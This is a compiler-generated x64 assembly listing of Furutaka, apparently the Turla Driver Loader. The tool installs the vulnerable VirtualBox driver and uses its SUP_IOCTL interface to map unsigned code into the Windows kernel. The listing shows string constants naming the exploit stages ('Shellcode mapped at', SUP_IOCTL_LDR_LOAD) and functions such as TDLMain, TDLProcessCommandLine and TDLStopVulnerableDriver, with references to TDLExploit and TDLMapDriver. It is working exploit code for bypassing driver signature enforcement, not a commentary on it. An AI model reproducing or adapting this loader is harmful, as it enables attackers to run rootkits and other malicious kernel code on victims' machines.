DB 'l', 00H, '.', 00H, 'e', 00H, 'x', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@
CONST SEGMENT
??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H
DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i'
DB 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i', 00H
DB 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H, 'd'
DB 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H
DB '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@
CONST SEGMENT
??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i'
DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'l', 00H, 'o', 00H, 'a', 00H
DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'i', 00H, 'n'
DB 00H, 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'd', 00H, 'r', 00H
DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i'
DB 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@
CONST SEGMENT
??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'K', 00H, 'e', 00H
DB 'r', 00H, 'n', 00H, 'e', 00H, 'l', 00H, ' ', 00H, 'b', 00H, 'a'
DB 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H, '0', 00H
DB 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'F', 00H
DB 'R', 00H, 'E', 00H, 'E', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'F', 00H, 'A', 00H, 'S', 00H, 'T', 00H, '_', 00H
DB 'D', 00H, 'O', 00H, '_', 00H, 'N', 00H, 'O', 00H, 'P', 00H, 00H
DB 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H
DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F'
DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H
DB 'l', 00H, 'l', 00H, ' ', 00H, 'c', 00H, 'o', 00H, 'm', 00H, 'p'
DB 00H, 'l', 00H, 'e', 00H, 't', 00H, 'e', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'S', 00H, 'E', 00H, 'T', 00H, '_', 00H, 'V', 00H
DB 'M', 00H, '_', 00H, 'F', 00H, 'O', 00H, 'R', 00H, '_', 00H, 'F'
DB 00H, 'A', 00H, 'S', 00H, 'T', 00H, ' ', 00H, 'c', 00H, 'a', 00H
DB 'l', 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l'
DB 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@
CONST SEGMENT
??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ DB 0dH
DB 00H, 0aH, 00H, 09H, 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H
DB 'e', 00H, 'r', 00H, ' ', 00H, 'i', 00H, 'm', 00H, 'a', 00H, 'g'
DB 00H, 'e', 00H, ' ', 00H, 'm', 00H, 'a', 00H, 'p', 00H, 'p', 00H
DB 'e', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 't', 00H, ' ', 00H, '0'
DB 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@
CONST SEGMENT
??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ DB ','
DB 00H, ' ', 00H, 's', 00H, 'i', 00H, 'z', 00H, 'e', 00H, ' ', 00H
DB '=', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H
DB 'O', 00H, 'A', 00H, 'D', 00H, ',', 00H, ' ', 00H, 's', 00H, 'u'
DB 00H, 'c', 00H, 'c', 00H, 'e', 00H, 's', 00H, 's', 00H, 0dH, 00H
DB 0aH, 00H, 09H, 00H, 'S', 00H, 'h', 00H, 'e', 00H, 'l', 00H, 'l'
DB 00H, 'c', 00H, 'o', 00H, 'd', 00H, 'e', 00H, ' ', 00H, 'm', 00H
DB 'a', 00H, 'p', 00H, 'p', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'a'
DB 00H, 't', 00H, ' ', 00H, '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'L', 00H
DB 'O', 00H, 'A', 00H, 'D', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l'
DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H
DB 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@
CONST SEGMENT
??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'p', 00H
DB 'e', 00H, 'n', 00H, 'L', 00H, 'd', 00H, 'r', 00H, '.', 00H, 'u'
DB 00H, '.', 00H, 'O', 00H, 'u', 00H, 't', 00H, '.', 00H, 'p', 00H
DB 'v', 00H, 'I', 00H, 'm', 00H, 'a', 00H, 'g', 00H, 'e', 00H, 'B'
DB 00H, 'a', 00H, 's', 00H, 'e', 00H, ' ', 00H, '=', 00H, ' ', 00H
DB '0', 00H, 'x', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'L', 00H, 'D', 00H, 'R', 00H, '_', 00H, 'O', 00H
DB 'P', 00H, 'E', 00H, 'N', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l'
DB 00H, 'l', 00H, ' ', 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H
DB 'e', 00H, 'd', 00H, 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_08EFILHJLF@furutaka@
CONST SEGMENT
??_C@_08EFILHJLF@furutaka@ DB 'furutaka', 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@
CONST SEGMENT
??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ DB 'L'
DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'S', 00H, 'U', 00H
DB 'P', 00H, '_', 00H, 'I', 00H, 'O', 00H, 'C', 00H, 'T', 00H, 'L'
DB 00H, '_', 00H, 'C', 00H, 'O', 00H, 'O', 00H, 'K', 00H, 'I', 00H
DB 'E', 00H, ' ', 00H, 'c', 00H, 'a', 00H, 'l', 00H, 'l', 00H, ' '
DB 00H, 'f', 00H, 'a', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 'd', 00H
DB 00H, 00H ; `string'
CONST ENDS
; COMDAT ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@
CONST SEGMENT
??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ DB 'The Magic Word!', 00H ; `string'
CONST ENDS
; COMDAT ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@
CONST SEGMENT
??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ DB 'S'
DB 00H, 'o', 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H
DB 'e', 00H, '\', 00H, 'O', 00H, 'r', 00H, 'a', 00H, 'c', 00H, 'l'
DB 00H, 'e', 00H, '\', 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H
DB 'u', 00H, 'a', 00H, 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, 00H
DB 00H ; `string'
CONST ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLMain DD 051501H
DD 06a7415H
DD 0680115H
DD 05006H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLProcessCommandLine DD 050f01H
DD 04a340fH
DD 048010fH
DD 07008H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLStopVulnerableDriver DD 060f01H
DD 0f640fH
DD 0e340fH
DD 0700bb20fH
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLStartVulnerableDriver DD 091d01H
DD 08f641dH
DD 08e341dH
DD 088011dH
DD 0700cf00eH
DD 0500bH
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLMapDriver DD 0b1f01H
DD 058341fH
DD 050011fH
DD 0e00ef010H
DD 0c00ad00cH
DD 060077008H
DD 05006H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLExploit DD 0d2601H
DD 06a7426H
DD 0696426H
DD 0683426H
DD 0620126H
DD 0e016f018H
DD 0c012d014H
DD 05010H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLResolveKernelImport DD 0c1c01H
DD 0c641cH
DD 0b541cH
DD 0a341cH
DD 0f018321cH
DD 0d014e016H
DD 07010c012H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLGetProcAddress DD 040a01H
DD 08340aH
DD 07006520aH
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$TDLVBoxInstalled DD 020601H
DD 030025206H
xdata ENDS
; COMDAT xdata
xdata SEGMENT
$unwind$RtlSecureZeroMemory DD 020501H
DD 017405H
xdata ENDS
; Function compile flags: /Ogspy
; COMDAT TDLMain
_TEXT SEGMENT
osv$ = 32
text$ = 320
TDLMain PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 734
$LN14:
mov QWORD PTR [rsp+8], rdi
push rbp
lea rbp, QWORD PTR [rsp-576]
sub rsp, 832 ; 00000340H
; Line 743
xor ecx, ecx
call QWORD PTR __imp_GetModuleHandleW
; Line 745
xor edx, edx
xor ecx, ecx
mov QWORD PTR g_hInstance, rax
call cuiInitialize
; Line 747
lea rcx, OFFSET FLAT:??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
call QWORD PTR __imp_SetConsoleTitleW
; Line 749
mov edx, 1
lea rcx, OFFSET FLAT:??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
call cuiPrintTextW
; Line 751
mov eax, 1
lock xadd DWORD PTR g_lApplicationInstances, eax
inc eax
; Line 752
cmp eax, 1
jle SHORT $LN5@TDLMain
; Line 753
lea rcx, OFFSET FLAT:??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
$LN13@TDLMain:
; Line 791
xor edx, edx
call cuiPrintTextW
or eax, -1 ; ffffffffH
jmp $LN3@TDLMain
$LN5@TDLMain:
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
mov edx, 276 ; 00000114H
lea rdi, QWORD PTR osv$[rsp]
mov ecx, edx
xor eax, eax
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 761
lea rcx, QWORD PTR osv$[rsp]
mov DWORD PTR osv$[rsp], edx
call QWORD PTR __imp_RtlGetVersion
; Line 762
cmp DWORD PTR osv$[rsp+4], 6
jae SHORT $LN6@TDLMain
; Line 763
lea rcx, OFFSET FLAT:??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
; Line 765
jmp SHORT $LN13@TDLMain
$LN6@TDLMain:
; Line 768
mov eax, DWORD PTR osv$[rsp+12]
; Line 770
lea rdx, OFFSET FLAT:??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
lea rcx, QWORD PTR text$[rbp-256]
mov DWORD PTR g_NtBuildNumber, eax
call _strcpy_w
; Line 771
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov ecx, DWORD PTR osv$[rsp+4]
mov rdx, rax
call ultostr_w
; Line 772
lea rdx, OFFSET FLAT:??_C@_13JOFGPIOO@?$AA?4@
lea rcx, QWORD PTR text$[rbp-256]
call _strcat_w
; Line 773
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov ecx, DWORD PTR osv$[rsp+8]
mov rdx, rax
call ultostr_w
; Line 774
lea rdx, OFFSET FLAT:??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
lea rcx, QWORD PTR text$[rbp-256]
call _strcat_w
; Line 775
lea rcx, QWORD PTR text$[rbp-256]
call _strend_w
mov ecx, DWORD PTR osv$[rsp+12]
mov rdx, rax
call ultostr_w
; Line 776
mov edx, 1
lea rcx, QWORD PTR text$[rbp-256]
call cuiPrintTextW
; Line 782
call TDLVBoxInstalled
mov DWORD PTR g_VBoxInstalled, eax
; Line 783
test eax, eax
je SHORT $LN7@TDLMain
; Line 784
mov edx, 1
lea rcx, OFFSET FLAT:??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
call cuiPrintTextW
$LN7@TDLMain:
; Line 787
call QWORD PTR __imp_GetCommandLineW
mov rcx, rax
call TDLProcessCommandLine
$LN3@TDLMain:
; Line 791
lock dec DWORD PTR g_lApplicationInstances
; Line 792
mov ecx, eax
call QWORD PTR __imp_ExitProcess
int 3
$LN11@TDLMain:
TDLMain ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLProcessCommandLine
_TEXT SEGMENT
szInputFile$ = 48
lpCommandLine$ = 592
c$ = 600
TDLProcessCommandLine PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 698
$LN11:
mov r11, rsp
mov QWORD PTR [r11+8], rbx
push rdi
sub rsp, 576 ; 00000240H
; Line 704
and DWORD PTR [r11+16], 0
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
lea rdi, QWORD PTR szInputFile$[rsp]
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 698
mov r10, rcx
; Line 706
lea r8, QWORD PTR szInputFile$[rsp]
; File C:\Program Files (x86)\Windows Kits\10\Include\10.0.19041.0\um\winnt.h
; Line 20225
xor eax, eax
mov ecx, 522 ; 0000020aH
rep stosb
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 706
lea rax, QWORD PTR [r11+16]
mov rcx, r10
mov r9d, 260 ; 00000104H
mov QWORD PTR [rsp+32], rax
mov edx, 1
or ebx, -1 ; ffffffffH
call GetCommandLineParamW
; Line 707
cmp DWORD PTR c$[rsp], 0
jne SHORT $LN2@TDLProcess
; Line 708
lea rcx, OFFSET FLAT:??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
; Line 709
jmp SHORT $LN9@TDLProcess
$LN2@TDLProcess:
; Line 712
lea rcx, QWORD PTR szInputFile$[rsp]
call QWORD PTR __imp_GetFileAttributesW
cmp eax, ebx
je SHORT $LN3@TDLProcess
; Line 713
call TDLStartVulnerableDriver
mov QWORD PTR g_hVBox, rax
; Line 714
cmp rax, -1
je SHORT $LN4@TDLProcess
; Line 715
lea rcx, QWORD PTR szInputFile$[rsp]
call TDLMapDriver
mov ebx, eax
; Line 716
call TDLStopVulnerableDriver
; Line 718
jmp SHORT $LN4@TDLProcess
$LN3@TDLProcess:
; Line 720
lea rcx, OFFSET FLAT:??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
$LN9@TDLProcess:
; Line 723
xor edx, edx
call cuiPrintTextW
$LN4@TDLProcess:
mov eax, ebx
mov rbx, QWORD PTR [rsp+592]
add rsp, 576 ; 00000240H
pop rdi
ret 0
TDLProcessCommandLine ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
; COMDAT TDLStopVulnerableDriver
_TEXT SEGMENT
uStr$ = 32
ObjectAttributes$ = 48
TDLStopVulnerableDriver PROC ; COMDAT
; File J:\Workspace\drivers\TDL\Source\Furutaka\main.c
; Line 623
$LN16:
mov QWORD PTR [rsp+8], rbx
mov QWORD PTR [rsp+16], rsi
push rdi
sub rsp, 96 ; 00000060H
; Line 629
mov edi, 1
lea rcx, OFFSET FLAT:??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@
mov edx, edi
call cuiPrintTextW
; Line 631
mov rcx, QWORD PTR g_hVBox
cmp rcx, -1
je SHORT $LN2@TDLStopVul
; Line 632
call QWORD PTR __imp_CloseHandle
$LN2@TDLStopVul:
; Line 634
xor edx, edx
xor ecx, ecx
mov r8d, 983103 ; 000f003fH
call QWORD PTR __imp_OpenSCManagerW
; Line 639
xor esi, esi
mov rbx, rax
test rax, rax
jne SHORT $LN3@TDLStopVul
; Line 640
mov edx, edi
lea rcx, OFFSET FLAT:??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@
call cuiPrintTextW
; Line 641
jmp $LN1@TDLStopVul
$LN3@TDLStopVul:
; Line 645
lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
mov rcx, rbx
call scmStopDriver
test eax, eax
lea r8, OFFSET FLAT:??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
lea rcx, OFFSET FLAT:??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
; Line 650
mov edx, edi
cmove rcx, r8
call cuiPrintTextW
; Line 653
cmp DWORD PTR g_VBoxInstalled, esi
jne $LN6@TDLStopVul
; Line 655
lea rdx, OFFSET FLAT:??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@
mov rcx, rbx
call scmRemoveDriver
lea rdx, OFFSET FLAT:??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
test eax, eax
lea rcx, OFFSET FLAT:??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@
cmove rcx, rdx
; Line 660
mov edx, edi
call cuiPrintTextW
; Line 665
lea rdx, OFFSET FLAT:??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@
mov QWORD PTR uStr$[rsp+8], rsi
lea rcx, QWORD PTR uStr$[rsp]
mov DWORD PTR uStr$[rsp], esi
call QWORD PTR __imp_RtlInitUnicodeString
; Line 666
lea rax, QWORD PTR uStr$[rsp]
mov DWORD PTR ObjectAttributes$[rsp], 48 ; 00000030H
xorps xmm0, xmm0
mov QWORD PTR ObjectAttributes$[rsp+16], rax
; Line 667
lea rcx, QWORD PTR ObjectAttributes$[rsp]
mov QWORD PTR ObjectAttributes$[rsp+8], rsi
movdqu XMMWORD PTR ObjectAttributes$[rsp+32], xmm0
mov DWORD PTR ObjectAttributes$[rsp+24], 64 ; 00000040H
call QWORD PTR __imp_NtDeleteFile
test eax, eax
lea rcx, OFFSET FLAT:??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@
lea rdx, OFFSET FLAT:??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
cmovs rcx, rdx
; Line 674
jmp SHORT $LN12@TDLStopVul
$LN6@TDLStopVul:
; Line 677
mov ecx, edi
call supBackupVBoxDrv
test eax, eax
lea rcx, OFFSET FLAT:??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@
lea rdx, OFFSET FLAT:??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
cmove rcx, rdx
$LN12@TDLStopVul:
; Line 684
mov edx, edi
call cuiPrintTextW
mov rcx, rbx
call QWORD PTR __imp_CloseServiceHandle
$LN1@TDLStopVul:
; Line 685
mov rbx, QWORD PTR [rsp+112]
mov rsi, QWORD PTR [rsp+120]
add rsp, 96 ; 00000060H
pop rdi
ret 0
TDLStopVulnerableDriver ENDP
_TEXT ENDS
; Function compile flags: /Ogspy
